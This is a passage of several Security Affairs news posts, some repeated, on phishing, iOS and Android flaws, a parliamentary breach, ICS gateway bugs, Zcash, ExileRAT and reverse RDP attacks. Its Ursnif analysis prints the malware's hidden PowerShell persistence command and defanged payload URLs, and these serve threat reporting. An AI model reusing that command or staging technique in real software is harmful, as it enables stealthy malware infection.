“Using Google Translate does a number of things; it fills the URL (address) bar with lots of random text, but the most important thing visually is that the victim sees a legitimate Google domain. In some cases, this trick will help the criminal bypass endpoint defenses.” reads the analysis published by Cashdollar.

“However, while this method of obfuscation might enjoy some success on mobile devices (the landing page is a near-perfect clone of Google’s older login portal), it fails completely when viewed from a computer.”

When the victims provide their Google/Facebook credentials to the phishing page, a script will send them to the attacker via email.

Once obtained the victim’s credentials, attackers carry out a second phishing attack to attempt obtaining also Facebook credentials.

According to Cashdollar, the Facebook phishing page was not optimized as well for mobile and was very easy to spot.

“Some phishing attacks are more sophisticated than others. In this case, the attack was easily spotted the moment I checked the message on my computer in addition to seeing it on my mobile device. However, other, more clever attacks fool thousands of people daily, even IT and Security professionals.” concludes the expert.

“The best defense is a good offense. That means taking your time and examining the message fully before taking any actions.”

Pierluigi Paganini

(SecurityAffairs – phishing, Google Translate)


The post Phishing campaign leverages Google Translate as camouflage appeared first on Security Affairs.

Three out of the four flaws fixed with iOS 12.1.4 were exploited in the wild

Security experts at Google discovered that two of the zero-day vulnerabilities patched by Apple with the release of iOS 12.1.4 were exploited in the wild.

Security researchers at Google revealed that two of the zero-day flaws addressed by Apple with the release of iOS 12.1.4 were exploited in the wild.

Apple iOS 12.1.4 version addresses four vulnerabilities, two issues associated with the FaceTime bug and two memory corruption flaws that could be exploited by attackers to elevate privileges and execute arbitrary code.

The CVE-2019-7287 vulnerability affects the IOKit and it can be exploited by a malicious app to execute arbitrary code with kernel privileges.

“An application may be able to execute arbitrary code with kernel privileges.” reads the security advisory.

“A memory corruption issue was addressed with improved input validation.”

The CVE-2019-7286 vulnerability impacts the Foundation component in iOS, it could allow a malicious application to gain elevated privileges.

“An application may be able to gain elevated privileges” continues the advisory. “A memory corruption issue was addressed with improved input validation.”

The flaws were discovered by Clement Lecigne of Google Threat Analysis Group, and Ian Beer and Samuel Groß of Google Project Zero. Apple also credited an anonymous researcher for the discovery of the vulnerabilities.

Project Zero Team Lead Ben Hawkes revealed that both CVE-2019-7286 and CVE-2019-7287 have been exploited in the wild. Google experts did not reveal technical details on the attacks they observed in the wild.

The popular Google Project white hat hacker Tavis Ormandy confirmed that three of the four vulnerabilities addressed by Apple were exploited by attackers in the wild.

Pierluigi Paganini

(SecurityAffairs – hacking, iOS 12.1.4)

The post Three out of the four flaws fixed with iOS 12.1.4 were exploited in the wild appeared first on Security Affairs.

Hackers broke into Australia’s Parliament Computer Network

Australia’s parliament confirmed that is investigating a suspicious security incident that affected its computer network.

Australia announced an ongoing investigation on unspecified ‘security incident’ in the federal parliament’s computer network.

“Following a security incident on the parliamentary computing network, a number of measures have been implemented to protect the network and its users,” parliamentary authorities said in a statement.

At the time of writing, authorities did not provide technical details on the security breach, officials said there was no initial evidence that data had been compromised by threat actors.

australian parliament house

Representatives from Australia’s Parliament did not release any statement on the attribution of the attack, but clearly, such kind of operations are usually associated with activities of nation-state actors.

“We have no evidence that this is an attempt to influence the outcome of parliamentary processes or to disrupt or influence electoral or political processes,” a statement said.

“Our immediate focus has been on securing the network and protecting data and users.”

In response to the incident, the IT staff reset passwords for all parliamentary

The Australian Signals Directorate (ASD) is also investigating the incident, according to the Australian broadcaster ABC intelligence agencies suspect the involvement of state-sponsored hackers.

“ASD and its Australian Cyber Security Centre will continue to work with (Parliament) to understand the full extent of this network compromise,” and ASD spokesperson told AFP.

“Meanwhile, the necessary steps are being taken to mitigate the compromise and prevent any harm.”

Pierluigi Paganini

(SecurityAffairs – hacking, Australia’s Parliament)

The post Hackers broke into Australia’s Parliament Computer Network appeared first on Security Affairs.

Security Affairs: Vulnerabilities in Kunbus Industrial Gateway allows to control the devices

Security of Industrial system is a top priority, experts found multiple serious flaws in a gateway made by Kunbus that could allow to completely control a device

Nicolas Merle from industrial cybersecurity firm Applied Risk discovered several flaws in a gateway produced by the Germany-based firm Kunbus, some of them could allow an attacker to gain full control of the vulnerable devices. Kunbus gateway solutions are used by several organizations worldwide.
Merle discovered five vulnerabilities in the Kunbus PR100088 Modbus gateways running version 1.0.10232 and likely earlier versions.

Applied Risk has classified two vulnerabilities as “critical” and two as “high severity.”

“An unauthenticated user can change the admin password, use it to get full control of the device, change its configuration and then lock the administrator out. An authenticated user can send a malicious request to the ftp service, stopping the device until the next cold reboot. An attacker able to sniff the traffic would be able to get any password used for login.” reads the security advisory published by Applied Risk.

“An unauthenticated user can see and change the Modbus register value via the web interface and reboot the device with a simple command, creating a denial of service. Finally, an attacker could change the Administrator password to the default one, to trick the operator to input back its password that he could in return recover via the ftp service.”

The gateway is affected by an improper authentication issue (CVE-2019-6527) in the Modbus gateway web application that fails to check that the user is logged in when processing the change of password page.

The CVE-2019-6527 flaw could be exploited by attackers to take complete control of the gateway and lock legitimate admins out.

The exploitation is possible only when an admin user logged in previously on the vulnerable gateway and the device has not been restarted since.

Another flaw, tracked as CVE-2019-6533, can be exploited by an unauthenticated attacker to read and modify the registers used to store Modbus values from the web interface. The flaw could be exploited by an attacker to cause a denial-of-service (DoS) condition by rebooting the device.

The researcher also found another DoS issue that could be exploited by sending a long request (more than 256 characters) to the FTP service.

Another issue discovered by the researcher is related to the disclosure of the user password that is included in the HTTP GET request used in the authentication phase. The password is in clear text and an attacker in the MiTM position can obtain it.

Kunbus PR100088 Modbus

Kunbus addressed four of the flaws with the release of version 1.1.13166 (Security Update R02). The remaining flaw affects the FTP service that can be used to retrieve user credentials stored on the device in clear text in an XML file. This latter issue is expected to be fixed at the end of February with the Security Update R03.

ICS-CERTand Kunbus also published security advisories describing the flaws.

Pierluigi Paganini

(SecurityAffairs – Kunbus, hacking)


The post Vulnerabilities in Kunbus Industrial Gateway allows to control the devices appeared first on Security Affairs.



Security Affairs

Vulnerabilities in Kunbus Industrial Gateway allows to control the devices

Security of Industrial system is a top priority, experts found multiple serious flaws in a gateway made by Kunbus that could allow to completely control a device

Nicolas Merle from industrial cybersecurity firm Applied Risk discovered several flaws in a gateway produced by the Germany-based firm Kunbus, some of them could allow an attacker to gain full control of the vulnerable devices. Kunbus gateway solutions are used by several organizations worldwide.
Merle discovered five vulnerabilities in the Kunbus PR100088 Modbus gateways running version 1.0.10232 and likely earlier versions.

Applied Risk has classified two vulnerabilities as “critical” and two as “high severity.”

“An unauthenticated user can change the admin password, use it to get full control of the device, change its configuration and then lock the administrator out. An authenticated user can send a malicious request to the ftp service, stopping the device until the next cold reboot. An attacker able to sniff the traffic would be able to get any password used for login.” reads the security advisory published by Applied Risk.

“An unauthenticated user can see and change the Modbus register value via the web interface and reboot the device with a simple command, creating a denial of service. Finally, an attacker could change the Administrator password to the default one, to trick the operator to input back its password that he could in return recover via the ftp service.”

The gateway is affected by an improper authentication issue (CVE-2019-6527) in the Modbus gateway web application that fails to check that the user is logged in when processing the change of password page.

The CVE-2019-6527 flaw could be exploited by attackers to take complete control of the gateway and lock legitimate admins out.

The exploitation is possible only when an admin user logged in previously on the vulnerable gateway and the device has not been restarted since.

Another flaw, tracked as CVE-2019-6533, can be exploited by an unauthenticated attacker to read and modify the registers used to store Modbus values from the web interface. The flaw could be exploited by an attacker to cause a denial-of-service (DoS) condition by rebooting the device.

The researcher also found another DoS issue that could be exploited by sending a long request (more than 256 characters) to the FTP service.

Another issue discovered by the researcher is related to the disclosure of the user password that is included in the HTTP GET request used in the authentication phase. The password is in clear text and an attacker in the MiTM position can obtain it.

Kunbus PR100088 Modbus

Kunbus addressed four of the flaws with the release of version 1.1.13166 (Security Update R02). The remaining flaw affects the FTP service that can be used to retrieve user credentials stored on the device in clear text in an XML file. This latter issue is expected to be fixed at the end of February with the Security Update R03.

ICS-CERTand Kunbus also published security advisories describing the flaws.

Pierluigi Paganini

(SecurityAffairs – Kunbus, hacking)


The post Vulnerabilities in Kunbus Industrial Gateway allows to control the devices appeared first on Security Affairs.

Security Affairs: Expert publicly disclosed the existence of 0day flaw in macOS Mojave

A zero-day vulnerability in macOS Mojave can be exploited by malware to steal plaintext passwords from the Keychain.

The security expert Linus Henze has disclosed the existence of a zero-day vulnerability in macOS Mojave that can be exploited by malware to steal plaintext passwords from the Keychain. According to Henze, the flaw affects macOS Mojave and earlier versions.

The researcher did not report the vulnerability to Apple, it publicly disclosed the existence of the flaw without making public its details.

Henze has published a video PoC for the flaw that shows how to use malware to extract passwords from the local Keychain password management system. The attack works on a system running the latest macOS Mojave OS version (10.14.3)

The attack is sneaky because it doesn’t require admin privileges for both the malicious app and the user account. The expert pointed out that the malicious code could exploit the flaw to steal passwords only from that user’s Keychain because other Keychains are locked.

macOS Mojave

Why Henze did not report the flaw to Apple?

Simple, the expert explained that did not share his discovery with the tech giant because the company doesn’t operate a bug bounty program for macOS. Apple contacted the experts after the publication of the video asking for more details about the issue, but Henze refused to provide them without a bounty.

Currently, Apple’s bug bounty program only covers hardware, iOS and
iCloud.

The popular MacOS expert and former NSA white hat hacker Patrick Wardle also confirmed the that the exploit wotks.

Pierluigi Paganini

(SecurityAffairs – MacOS Mojave, hacking)

The post Expert publicly disclosed the existence of 0day flaw in macOS Mojave appeared first on Security Affairs.



Security Affairs

Expert publicly disclosed the existence of 0day flaw in macOS Mojave

A zero-day vulnerability in macOS Mojave can be exploited by malware to steal plaintext passwords from the Keychain.

The security expert Linus Henze has disclosed the existence of a zero-day vulnerability in macOS Mojave that can be exploited by malware to steal plaintext passwords from the Keychain. According to Henze, the flaw affects macOS Mojave and earlier versions.

The researcher did not report the vulnerability to Apple, it publicly disclosed the existence of the flaw without making public its details.

Henze has published a video PoC for the flaw that shows how to use malware to extract passwords from the local Keychain password management system. The attack works on a system running the latest macOS Mojave OS version (10.14.3)

The attack is sneaky because it doesn’t require admin privileges for both the malicious app and the user account. The expert pointed out that the malicious code could exploit the flaw to steal passwords only from that user’s Keychain because other Keychains are locked.

macOS Mojave

Why Henze did not report the flaw to Apple?

Simple, the expert explained that did not share his discovery with the tech giant because the company doesn’t operate a bug bounty program for macOS. Apple contacted the experts after the publication of the video asking for more details about the issue, but Henze refused to provide them without a bounty.

Currently, Apple’s bug bounty program only covers hardware, iOS and
iCloud.

The popular MacOS expert and former NSA white hat hacker Patrick Wardle also confirmed the that the exploit wotks.

Pierluigi Paganini

(SecurityAffairs – MacOS Mojave, hacking)

The post Expert publicly disclosed the existence of 0day flaw in macOS Mojave appeared first on Security Affairs.

Ursnif: Long Live the Steganography and AtomBombing!

Yoroi ZLab – Cybaze uncovered a new wave of Ursnif attacks using a variant that implements an exotic process injection technique called AtomBombing

Another wave of Ursnif attacks hits Italy. 
Ursnif is one of the most active banking trojans. It is also known as GOZI, in fact, it is a fork of the original Gozi-ISFB banking Trojan that got its source code leaked in 2014 updating and evolving Gozi features over the years. Also in this variant, Ursnif uses weaponized office document with a VBA macro embedded that act as a dropper and multi-stage highly obfuscated Powershell scripts in order to hide the real payload. In addition, this Ursnif use also steganography to hide the malicious code and avoid AV detection.

Ursnif is one of the most active banking trojan. It is also known as GOZI, in fact it is a fork of the original Gozi-ISFB banking Trojan that got its source code leaked in 2014 updating and evolving Gozi features over the years. Also in this variant, Ursnif use weaponized office document with a VBA macro embedded that act as a dropper and multi-stage highly obfuscated powershell scripts in order to hide the real payload. In addition, this Ursnif use also steganography to hide the malicious code and avoid AV detection.

Moreover, this variant uses an exotic process injection technique called AtomBombing (through QueueUserAPC) which exploit Windows AtomTable, in order to inject into explorer.exe in a more stealthier way, because no remote threads are created in the target process.

Technical Analysis

The initial infection vector appears as a corrupted Excel file, inviting the user to enable macro execution to properly view the contents of the fake document, typically purchase order, invoice and so on. 

Figure 1. Ursnif macro-weaponized document.

Extracting the macro code, shows the malware, in the first instance, checks the victim country using the Application.International MS Office property. If the result corresponds to Italy (code 39), the macro executes the next command using Shell function.

Figure 2. Part of Visual Basic macro code.

The remaining functions of the macro are used to prepare the shell command to launch, concatenating several strings encoded in different ways (mainly in decimal and binary). The resulting command contains a huge binary string, which will be converted into a new Powershell command using the function:

[Convert]::ToInt16() -as[char]

Figure 3. Powershell script deployed by macro code.

As shown in the above figure, the malware tries to download an image from at least one of two embedded URLs:

  • https://images2.imgbox[.]com/55/c4/rBzwpAzi_o.png
  • https://i.postimg[.]cc/PH6QvFvF/mario.png?dl=1

The apparently legit image actually contains a new Powershell command. The weaponized image is crafted using the Invoke-PSImage script, which allows to embeds the bytes of a script into the pixels of a PNG file. 

Figure 4. Powershell script hidden into “Fancy Mario”’s image.

Et voilà, another obfuscated Powershell stage. The payload is encoded in Base64, so it is easy to move on and reveal the next code.

Figure 5. Another stage of deobfuscation process.

Basically, it seems hexadecimal encoded which can be decoded through the previous [Convert]::ToInt16 function.

The final code is:

Figure 6. Powershell script downloading the Ursnif loader.

It executes another check against victim’s country, ensuring it is Italy. The information derives from the command:

Get-Culture | Format-List -Property *

If the check is positive, the script will download an EXE payload from http://fillialopago[.]info/~DF2F63, store it in %TEMP%\Twain001.exe and then execute it.

At the analysis time, the file is not detected by most antiviruses:

Figure 7. Ursnif loader detection rate

Despite its low detection, this executable is a classic Ursnif loader which is responsible to contact the server to download malicious binary which will be injected into explorer.exe process. It uses the function IWebBrowser.Navigate to download data from its malicious server felipllet[.]info with an URI path that looks like a path to a file video (.avi).

Figure 8. IWebBrowser.Navigate function invocation.

The server responds to this request sending encrypted data, as show in the following figure

Figure 9. Part of network traffic containing some encrypted data.

After a decryption routine, all useful data is stored into registry keys at HKCU\Software\AppDataLow\Software\Microsoft\{GUID}.

Figure 10. Registry keys set by the malware.

The regvalue named “defrdisc” (which reminds to a legit Disk Defragmentation Utility) contains the command will be executed as next step and at Windows startup, as displayed below.

Figure 11. Command executed at machine’s startup.

The command’s only goal is to execute the data contained into “cmiftall” regvalue through Powershell engine.

C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create “powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E’).cmiftall))”

The “cmiftall”’s data is simply a Powershell script encoded in Hexadecimal way, so it is possible to reconstruct its behavior.

Figure 12. Powershell script used to inject the final binary through the APC Injection technique.

So, using the Powershell script stored into regkey (shown above), Ursnif is able to allocate space enough for its malicious byte array, containing the final payload, and to start it as legit process’ thread through QueueUserAPC and SleepEx calls.

The Ursnif’s complete workflow is shown in figure:

Figure 13. Ursnif’s workflow.

Finally, from data contained into last script’s byte array, it is possible to extract a DLL which corresponds to what Ursnif inject into explorer.exe process.

This DLL seems to be corrupted, as stated by some static analysis tools:

Figure 14. Info about the malformed DLL.

However, when it is loaded in memory using APC injection technique, it works with no problems. Submitting the file to VirusTotal, the result is devastating: 0/56 anti-malware detects it.

Figure 15. Final DLL’s detection rate.

Conclusions

As stated first by us in the previous Ursnif analysis in December 2018 and after by Cisco Talos Intelligence in January 2019, also this new Ursnif sample uses the same APC injection technique to instill its final binary into explorer.exe process, along with obfuscation and steganography in order to hide its malicious behaviour. Ursnif is more active and widespread than yesterday, the contacted C2 is not reachable but the malware implant is still alive due to the fact that the crooks are constantly changing their C2 to diverting tracking and analysis.

Yoroi ZLab – Cybaze researchers are continuing the analysis of this undetected DLL in order to extract information and evidences to share with the research community.

Further information, including IoCs and Yara rules are reported in the analysis published on the Yoroi Blog.

Pierluigi Paganini

(SecurityAffairs – Ursnif, malware)

The post Ursnif: Long Live the Steganography and AtomBombing! appeared first on Security Affairs.

Android devices could be hacked by viewing a malicious PNG Image

Google patched a critical flaw in its Android OS that allows an attacker to send a specially crafted PNG image file to hack a target device,

Opening an image file on your smartphone could allow attackers to hack into your Android device due to three critical vulnerabilities,
CVE-2019-1986, CVE-2019-1987, and CVE-2019-1988.

The flaws affect millions of Android devices running versions of the Google OS, ranging from Android 7.0 Nougat to the latest Android 9.0 Pie.

Google addressed the three vulnerabilities in the Android Open Source Project (AOSP) as part of the February Android Security Updates.

Android PNG image hack

Even if Google has addressed the flaws, each vendor will have to distribute the patch for its models and this process usually doesn’t occur on a regular basis.

Researchers at Google did not provide technical details for the flaws, the tech giant only reported that the security updates addressed a “heap buffer overflow flaw,” “errors in SkPngCodec,” and vulnerabilities in some components that render PNG images.

According to the security advisory published by Google, the most severe of the three vulnerabilities could allow a maliciously crafted .PNG image file to execute arbitrary code on the vulnerable Android devices.

“The most severe of these issues is a critical security vulnerability in Framework that could allow a remote attacker using a specially crafted PNG file to execute arbitrary code within the context of a privileged process.” reads the security bulletin.

“The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.”

Experts pointed out that an attacker could exploit the flaw by tricking potential victims into opening a maliciously crafted PNG image file on their Android.

The malicious image could be sent through a mobile message service or an email app.

Google addressed three critical flaws in The Framework component, the overall number of critical issues is 11. The tech giant addressed a total of 42 flaws, 30 of which were rated high severity.

Google fixed 4 flaws in Android components manufactured by NVIDIA and five by the chip maker Qualcomm.

The good news is that Google is not aware of active exploitation of the flaws addressed by the company in the wild.

Google reported the flaws to its partners in January.

“Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP. ” concludes Google.

Pierluigi Paganini

(SecurityAffairs – Android, PNG)

The post Android devices could be hacked by viewing a malicious PNG Image appeared first on Security Affairs.

Security Affairs: Security expert Marco Ramilli released for free the Malware Hunter tool

Malware researcher Marco Ramilli released for free the Malware Hunter tool a simple but interesting catching tool base on static YARA rules.Malware researcher Marco Ramilli released for free the Malware Hunter tool a simple but interesting catching tool base on static YARA rules..

I’v been working on cybersecurity for most than 10 years. During my career, I’ve held numerous roles which took me facing many problems: I had to solve technical issues as well as management, economic and financial ones. Every time I needed a “tool” to help a decision or to solve a technical question I started by seeking on “sourceforge/github” looking for something that would fit my needs. If what I needed wasn’t there, I’ve always built it on my own by using what was available at that time. Nowadays, those tools are still producing data which I believe might be useful to many people. Today I’d like to introduce you a simple but interesting malware catching tool base on static YARA rules that is available HERE.

It takes sample feeds and it analyses them against hundreds of YARA rules. Some of them are publicly available some other have been written on my own. The engine is quite slow right now, but it has analysed several recent Samples. You might decide to get deep into last processed samples by clicking on table raw (which highlights last 10 processed samples) or to search for a specific hash by pasting your desired sha256 and clicking on the “Search” button.

In both ways, a modal form will appear showing out the rules that match the hash you asked for. Since it’s a personal platform it could be quite slow so far. Hope you enjoy it! Have fun

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – MartyMcFly, malware)

The post Security expert Marco Ramilli released for free the Malware Hunter tool appeared first on Security Affairs.



Security Affairs

Security expert Marco Ramilli released for free the Malware Hunter tool

Malware researcher Marco Ramilli released for free the Malware Hunter tool a simple but interesting catching tool base on static YARA rules.Malware researcher Marco Ramilli released for free the Malware Hunter tool a simple but interesting catching tool base on static YARA rules..

I’v been working on cybersecurity for most than 10 years. During my career, I’ve held numerous roles which took me facing many problems: I had to solve technical issues as well as management, economic and financial ones. Every time I needed a “tool” to help a decision or to solve a technical question I started by seeking on “sourceforge/github” looking for something that would fit my needs. If what I needed wasn’t there, I’ve always built it on my own by using what was available at that time. Nowadays, those tools are still producing data which I believe might be useful to many people. Today I’d like to introduce you a simple but interesting malware catching tool base on static YARA rules that is available HERE.

It takes sample feeds and it analyses them against hundreds of YARA rules. Some of them are publicly available some other have been written on my own. The engine is quite slow right now, but it has analysed several recent Samples. You might decide to get deep into last processed samples by clicking on table raw (which highlights last 10 processed samples) or to search for a specific hash by pasting your desired sha256 and clicking on the “Search” button.

In both ways, a modal form will appear showing out the rules that match the hash you asked for. Since it’s a personal platform it could be quite slow so far. Hope you enjoy it! Have fun

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – MartyMcFly, malware)

The post Security expert Marco Ramilli released for free the Malware Hunter tool appeared first on Security Affairs.

A critical counterfeiting vulnerability addressed in Zcash

A critical counterfeiting vulnerability in Zcash cryptocurrency could have allowed coining an infinite number of Zcash (ZEC) cryptocurrency.

Reading some news, investors could believe that cryptocurrencies are not a good investment. A few days ago, QuadrigaCX Bitcoin exchange announced to have lost USD 145 million worth of cryptocurrency because the only person with access to its cold storage has died.

News of the day is that a critical vulnerability in Zcash cryptocurrency could have allowed coining an infinite number of Zcash (ZEC) cryptocurrency.

The Zcash development team have discovered and addressed the shocking critical flaw.

The Zcash cryptocurrency was presented i October 2016 and compared with the popular Bitcoin it ensures total anonymity because each participant in a transaction remains hidden.

With this premise, the Zcash has immediately attracted great interest from investors, miners and of course cybercriminals.

ZCash counterfeiting vulnerability

The Zerocoin Electric Coin Company who developed Zcash disclosed the
counterfeiting flaw that was discovered by its cryptographer Ariel Gabizon.
Gabizon discovered the flaw in its Zcash code on 1st March 2018 just before a talk at the Financial Cryptography conference.

Gabizon immediately reported the flaw to Sean Bowe, a Zcash Company’s cryptographer, the development team decided did not disclose the issue avoid abuses.

Zcash revealed that the flaw was known only by four Zcash employees before it addressed the issue with a patch implemented in the Zcash network on 28th October 2018.

“To exploit the counterfeiting vulnerability, an attacker would have needed to possess information found in the large MPC protocol transcript that was made available shortly after the launch of Zcash.” reads the post published by the company.

“This transcript had not been widely downloaded and was removed from public availability immediately upon discovery of the vulnerability to make it more difficult to exploit.”

Experts at ZCash explained that the exploitation of the vulnerability would have required a high level of technical and cryptographic sophistication, and only a few people have it. The company excluded that attackers have already exploited the counterfeiting flaw.

The counterfeiting vulnerability affected a variant of zk-SNARKs, the implementation of zero-knowledge cryptography Zcash used to encrypt and protect the transactions. zk-SNARKs was also implemented in other different projects.

Komodo blockchains and Horizen were affected by the same flaw and reportedly addressed it after being informed of the issue by Zcash experts in mid-November 2018.

The vulnerability was the result of a “parameter setup algorithm” that allowed “a cheating prover to circumvent a consistency check” and thereby transformed “the proof of one statement into a valid-looking proof of a different statement.”

Experts pointed out that an attacker with access to the multi-party computation (MPC) ceremony transcript (used to set up the privacy features for Zcash) would have been able to create false proofs that falsely convince the original Sprout zk-SNARK verifier of the correctness of a transaction.

The Zcash development team confirmed that the flaw had existed in the cryptocurrency scheme for years.

“The vulnerability had existed for years but was undiscovered by numerous expert cryptographers, scientists, third-party auditors, and third-party engineering teams who initiated new projects based upon the Zcash code.” reported the company.

“The Zcash Company has seen no evidence that counterfeiting has occurred as might be discovered by monitoring the the total amount of Zcash held in Sprout addresses (i.e., the Sprout shielded pool). As long as the value in the shielded pools are greater than zero, no counterfeiting has been detected.”

Pierluigi Paganini

(SecurityAffairs – ZCash counterfeiting vulnerability, hacking)

The post A critical counterfeiting vulnerability addressed in Zcash appeared first on Security Affairs.

New ExileRAT backdoor used in attacks aimed at users in Tibet

A malware campaign using new LuckyCat-Linked RAT dubbed
ExileRAT has been targeting the mailing list of the organization officially representing the Tibetan government-in-exile.

Security experts at Talos group have uncovered a malware campaign using the ExileRAT backdoor to target the mailing list of the organization officially representing the Tibetan government-in-exile.

Threat actors are delivering the malware via a weaponized Microsoft PowerPoint document, the messages are reaching people in a mailing list run by the Central Tibetan Administration (CTA).

ExileRAT campaign

The nature of malware and the targets suggests the involvement of nationstate actor carrying out a cyber espionage campaign.

Given the nature of the threat and the targets, the campaign was likely designed for espionage purposes, Talos’ security researchers say. 

The bait PowerPoint document is a copy of a legitimate PDF available on CTA’s website, it was sent by attackers to all subscribers to the CTA mailing list,

“Cisco Talos recently observed a malware campaign delivering a malicious Microsoft PowerPoint document using a mailing list run by the Central Tibetan Administration (CTA), an organization officially representing the Tibetan government-in-exile.” reads the analysis published by Talos.

“The document used in the attack was a PPSX file, a file format used to deliver a non-editable slideshow derived from a Microsoft PowerPoint document.”

The experts received an email message from the CTA mailing list containing an attachment, “Tibet-was-never-a-part-of-China.ppsx,” the researchers noticed that the standard Reply-To header used by the CTA mailings was modified to redirect responses to an email address (mediabureauin [at] gmail.com) controlled by the hackers.

The weaponized documents exploit the CVE-2017-0199 flaw, a zero-day
arbitrary code execution vulnerability fixed by Microsoft in April 2017 and that has been actively exploited in attacks in the wild.

The exploit code used by the attackers originated from a public script available on GitHub, researchers noticed that the PPSX also attempts to contact iplocation to perform some geo-location lookups.  

It connects to the command and control (C&C) server to receive a JavaScript script responsible for downloading the final payload. 

The malicious code is executed via WScriptwhile  also utilizing cmd.exe to create a scheduled task called “Diagnostic_System_Host,” the name is
similar to the legitimate system task name “Diagnostic System Host” without the “_” (underscores).

The ExileRAT used in this campaign support commands to retrieve system information (i.e. computer name, username, listing drives, network adapter, and process names), exfiltrate data and and execute or terminate processes.

Talos pointed out that C2 infrastructure has been used in multiple campaigns, including attacks against Tibetan activists leveraging a newer version of the LuckyCat Android RAT.

“This newer version includes the same features as the 2012 version (file uploading, downloading, information stealing and remote shell) and adds several new features, including file removing, app execution, audio recording, personal contact stealing, SMS stealing, recent call stealing and location stealing.” continues the report.

Experts conclude that this new campaign represents an “evolution in a series of attacks targeting a constituency of political supporters, and further evidence that not all attacks require the use of zero-day vulnerabilities,” Talos says. 

The good news is that attackers leveraged an old issue that could be easily detected by up-to-date defense systems. 

Pierluigi Paganini

(SecurityAffairs – hacking, Exilerat)

The post New ExileRAT backdoor used in attacks aimed at users in Tibet appeared first on Security Affairs.

Reverse RDP Attack – Rogue RDP Server can be used to hack RDP clients

Researchers at Check Point Software Technologies have discovered more than two dozen vulnerabilities in the popular implementations of the remote desktop protocol (RDP).

Security experts at Check Point Software Technologies discovered a total of 25 security flaws in the popular implementations of the remote desktop protocol (RDP). 16 that have been rated as “major,” some of the vulnerabilities could be exploited by a malicious RDP server to hack a device running the client RDP software.

Remote Desktop Protocol (RDP) is a widely adopted protocol for remote administration, but it could dramatically enlarge the attack surface if it isn’t properly managed.

RDP

Researchers have focused their analysis on FreeRDP, rdesktop, and the Remote Desktop Connection implemented in Windows OS.

“Used by thousands of IT professionals and security researchers worldwide, the Remote Desktop Protocol (RDP) is usually considered a safe and trustworthy application to connect to remote computers.” reads the analysis published by the experts.

“However, Check Point Research recently discovered multiple critical vulnerabilities in the commonly used Remote Desktop Protocol (RDP) that would allow a malicious actor to reverse the usual direction of communication and infect the IT professional or security research’s computer. Such an infection could then allow for an intrusion into the IT network as a whole. 16 major vulnerabilities and a total of 25 security vulnerabilities were found overall.”

The analysis of the open source rdesktop tool, an older open-source RDP client that comes by default in Kali-linux distros. revealed the presence of 19 vulnerabilities, most of them heap-based buffer overflows.

11 vulnerabilities were considered as “major” issues, some of the flaws can be exploited by a rogue RDP server under the control of the attacker to remotely execute code on an RDP client connecting to it.

The situation is better for FreeRDP, the most popular and mature open-source RDP client on Github. because the experts have only discovered six vulnerabilities, five of which having a major impact.

Experts discovered also, in this case, some flaws that could allow a rogue RDP server to execute arbitrary code on a client.

Micorsoft RDP is also affected by major vulnerabilities, experts discovered that an issue related to the fact that the client and the server share clipboard data by default.

This means that anything in the clipboard could be accessed by the attackers, for example copied files, passwords, cryptocurrency wallet keys and so on. For example, an attacker can drop a malicious file into the Windows “Startup” folder so that it would get executed every time the system is booted.

“If a client uses the “Copy & Paste” feature over an RDP connection, a malicious RDP server can transparently drop arbitrary files to arbitrary file locations on the client’s computer, limited only by the permissions of the client. For example, we can drop malicious scripts to the client’s “Startup” folder, and after a reboot they will be executed on his computer, giving us full control.” continues the experts.

“Note: In our exploit, we simply killed rdpclip.exe, and spawned our own process to perform the path traversal attack by adding additional malicious file to every “Copy & Paste” operation. The attack was performed with “user” permissions, and does not require the attacker to have “system” or any other elevated permission.”

Below a video PoC published by the experts:

The vulnerabilities discovered by the experts could be used in multiple attack scenarios, hackers can exploit them to compromise a target machine running a vulnerable RDP client and exfiltrate data.

Attackers can gain elevated network permissions by deploying such an attack, then attempting lateral movement inside the organization. Hackers can, for example, attack an IT member that connects to an infected work station inside the corporate network or a malware researcher that connects to a remote sandboxed virtual machine that contains a tested malware. In the latter scenario, it is possible to allow the malicious code to escape the sandbox and compromise the corporate network.

Checkpoint reported its findings to the development team of the RDP tools in October 2018. FreeRDP developers addressed the flaws with a patch to the software in the GitHub repository in November, Rdesktop developers released a fix in mid-January.

Microsoft confirmed the findings of the study but replied with this eloquent and questionable answers:

“Thank you for your submission. We determined your finding is valid but does not meet our bar for servicing. For more information, please see the Microsoft Security Servicing Criteria for Windows (https://aka.ms/windowscriteria).”

This means that Microsoft users are exposed to attackers implementing the attacks described by Check Point.

